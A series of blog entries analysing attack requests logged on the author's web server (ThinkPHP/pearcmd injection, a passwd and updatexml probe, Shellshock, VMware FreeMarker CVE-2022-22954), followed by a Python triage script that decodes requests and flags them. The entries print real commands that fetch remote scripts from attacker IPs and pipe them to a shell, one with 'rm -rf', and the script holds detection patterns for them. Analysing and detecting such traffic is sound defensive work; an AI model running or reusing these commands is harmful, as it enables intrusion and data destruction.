Fri, 15 Mar 2024 12:20:16 EDT
Cracker Jack Report
My web server logged the following request on March 14th.
GET /index.php? s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index& cmd=curl%20http%3A%2F%2F193.222.96.163%2Foy.sh%20%7C%20sh%20%7C%7C%20wget%20-O-%20http%3A%2F%2F193.222.96.163%2Foy.sh%20%7C%20sh
The second parameter decodes to:
cmd=curl http://193.222.96.163/oy.sh | sh || wget -O- http://193.222.96.163/oy.sh | sh
You know the drill. Another command injection attack. This attack is a variation on that described in CVE-2022-47945. This is straightforward. Use curl or wget, whichever is available, to download the script oy.sh, then pipe it to a shell.
Yet another instance of a PHP module that inserts client data into an executable context. The PHP ecosystem is a security disaster.
Tue, 12 Mar 2024 11:24:04 EDT
Cracker Jack Report
My web server logged the following request on March 11th.
GET /?2dWfN18rtTf8QlVATVMbT2AA1E9=../../../../../../../../etc/passwd &2dWfN18rtTf8QlVATVMbT2AA1E9=1%20and%20updatexml(1,concat(0x7e,(select%20md5(85453))),1)
The second parameter decodes to:
1 and updatexml(1,concat(~,(select md5(85453))),1)
This is an XPath injection attack that seeks to cause an application server to dump the system password file.
The infrastructure of the web is a swamp of security vulnerabilities, which is one of the reasons why it must be replaced.
Mon, 26 Feb 2024 15:45:42 EST
Cracker Jack Report
Below is the User-Agent header of a client request on my website for February 24th. I have reformatted a single line of commands.
() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://204.76.203.216/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'
This is a variation on the Shellshock attack. It is associated with more than one CVE (CVE-2014-*). The first line is gibberish that triggers the vulnerability in the bash shell. The second line probably plays a role in the exploit, but I’m not sure.
The commands have not been obfuscated with percent-encoding because they have been inserted into the User-Agent header. It would be unusual for a web or application server to percent-decode that header. The target web or application server puts that header into a context in which it is parsed by a shell. What a disaster.
This is a standard command injection attack: delete the current filesystem hierarchy, change to the /tmp directory because it’s world-writable, download a script, make it executable, and run it. The shell script installs tools to facilitate remote command execution.
Sat, 17 Feb 2024 11:08:38 EST
Cracker Jack Report
I have another injection attack for your perusal. The request has been split in two. This is from my web server log for February 16th.
GET /catalog-portal/ui/oauth/verify?error=& deviceUdid=%24%7b%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%6d%6b%64%69%72%20%2d%70%20%2f%74%6d%70%2f%24%28%77%68%6f%61%6d%69%29%3b%20%63%64%20%2f%74%6d%70%2f%24%28%77%68%6f%61%6d%69%29%3b%20%77%67%65%74%20%68%74%74%70%3a%2f%2f%64%77%2e%6f%68%75%79%61%6c%2e%78%79%7a%2f%64%6f%77%6e%6c%6f%61%64%2f%72%65%64%74%61%69%6c%2e%73%68%20%2d%4f%2d%20%7c%20%73%68%3b%20%63%75%72%6c%20%68%74%74%70%3a%2f%2f%64%77%2e%6f%68%75%79%61%6c%2e%78%79%7a%2f%64%6f%77%6e%6c%6f%61%64%2f%72%65%64%74%61%69%6c%2e%73%68%20%7c%20%73%68%3b%20%65%63%68%6f%20%76%6d%77%61%72%65%2e%73%65%6c%66%72%65%70%22%29%7d%7d
I decoded the percent-encoded text with munger…
(let ((r0 (regcomp "%([0-9A-Fa-f][0-9A-Fa-f])"))) (defun decode (str) (replace r0 (char (hex2dec m1)) str)))
…and formatted the output.
${ {"freemarker.template.utility.Execute"? new() ("mkdir -p /tmp/$(whoami); cd /tmp/$(whoami); wget http://dw.ohuyal.xyz/download/redtail.sh -O- | sh; curl http://dw.ohuyal.xyz/download/redtail.sh | sh; echo vmware.selfrep") } }
This is the attack described in CVE-2022-22954. It targets VMware Workspace ONE Access and Identity Manager. This is another example of a support utility passing unsanitized arguments to a shell for interpretation. Two attempts are made to download the redtail.sh script, each invoking a different utility in case one or the other is not installed on the host. The downloaded script is then fed directly to a subshell for execution. What a disaster.
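The percent-decoding step done with munger in the February 17th report, and the pattern that recurs across all four reports (fetch a script with curl or wget and hand it to sh, or smuggle a shell command through a header), can be folded into a small log-triage script. The Python below is an added example, not code from this blog or from munger. The rule names are labels chosen here, not an established taxonomy; the sample requests are constructed from the requests quoted in the reports above, except that the download host and filename in the Shellshock User-Agent sample are replaced by the placeholder http://203.0.113.5/x.sh.

```python
"""Decode percent-encoded request fields and flag the injection patterns
quoted in the reports above.  Added example; not the blog's munger code."""
import re
from typing import Dict, List

# Same idea as the munger one-liner: each %XX pair becomes the character it encodes.
_PCT = re.compile(r"%([0-9A-Fa-f]{2})")


def percent_decode(text: str) -> str:
    """Replace every %XX escape with its character; everything else is kept verbatim."""
    return _PCT.sub(lambda m: chr(int(m.group(1), 16)), text)


# (rule name, regex applied to the DECODED value).  Names are labels for this example.
_RULES = [
    ("shellshock_header", re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")),
    ("remote_script_piped_to_shell", re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba)?sh\b")),
    ("remote_script_fetch", re.compile(r"\b(?:curl|wget)\b[^;|]*https?://")),
    ("destructive_rm", re.compile(r"\brm\s+-rf\b")),
    ("passwd_traversal", re.compile(r"(?:\.\./){2,}.*etc/passwd")),
    ("updatexml_injection", re.compile(r"\bupdatexml\s*\(", re.IGNORECASE)),
    ("freemarker_execute", re.compile(r"freemarker\.template\.utility\.Execute")),
]


def find_indicators(decoded: str) -> List[str]:
    """Return the names of all rules that match, in rule order."""
    return [name for name, rx in _RULES if rx.search(decoded)]


def triage(field: str, raw: str) -> Dict[str, object]:
    """Decode one request field (query string or header value) and report its indicators."""
    decoded = percent_decode(raw)
    return {"field": field, "decoded": decoded, "indicators": find_indicators(decoded)}


# Constructed samples: (label, field name, raw value) taken from the reports above.
SAMPLES = [
    ("2024-03-14 ThinkPHP/pearcmd", "query",
     "cmd=curl%20http%3A%2F%2F193.222.96.163%2Foy.sh%20%7C%20sh%20%7C%7C%20"
     "wget%20-O-%20http%3A%2F%2F193.222.96.163%2Foy.sh%20%7C%20sh"),
    ("2024-03-11 passwd/updatexml", "query",
     "2dWfN18rtTf8QlVATVMbT2AA1E9=../../../../../../../../etc/passwd"
     "&2dWfN18rtTf8QlVATVMbT2AA1E9=1%20and%20updatexml(1,concat(0x7e,(select%20md5(85453))),1)"),
    # Placeholder host/filename (203.0.113.5/x.sh) stand in for the ones in the original header.
    ("2024-02-24 Shellshock User-Agent", "User-Agent",
     "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://203.0.113.5/x.sh; "
     "chmod 777 x.sh; ./x.sh'"),
    ("2024-02-16 FreeMarker deviceUdid", "query",
     "%24%7b%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e"
     "%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22"
     "%6d%6b%64%69%72%20%2d%70%20%2f%74%6d%70%2f%24%28%77%68%6f%61%6d%69%29%3b%20"
     "%63%64%20%2f%74%6d%70%2f%24%28%77%68%6f%61%6d%69%29%3b%20"
     "%77%67%65%74%20%68%74%74%70%3a%2f%2f%64%77%2e%6f%68%75%79%61%6c%2e%78%79%7a%2f"
     "%64%6f%77%6e%6c%6f%61%64%2f%72%65%64%74%61%69%6c%2e%73%68%20%2d%4f%2d%20%7c%20%73%68%3b%20"
     "%63%75%72%6c%20%68%74%74%70%3a%2f%2f%64%77%2e%6f%68%75%79%61%6c%2e%78%79%7a%2f"
     "%64%6f%77%6e%6c%6f%61%64%2f%72%65%64%74%61%69%6c%2e%73%68%20%7c%20%73%68%3b%20"
     "%65%63%68%6f%20%76%6d%77%61%72%65%2e%73%65%6c%66%72%65%70%22%29%7d%7d"),
]


def report() -> List[Dict[str, object]]:
    """Triage every sample; a real deployment would read these from the access log."""
    return [dict(label=label, **triage(field, raw)) for label, field, raw in SAMPLES]


if __name__ == "__main__":
    for entry in report():
        print(f"{entry['label']}: {entry['indicators']}")
        print(f"    {entry['decoded']}")
```

The decoder is deliberately applied to header values as well as query strings: as the February 24th report notes, a server normally does not percent-decode User-Agent, so the Shellshock sample matches on the raw text, while the deviceUdid sample only yields its indicators after decoding. Matching on the decoded form is what keeps a single `| sh` rule from being evaded by `%7C%20sh`.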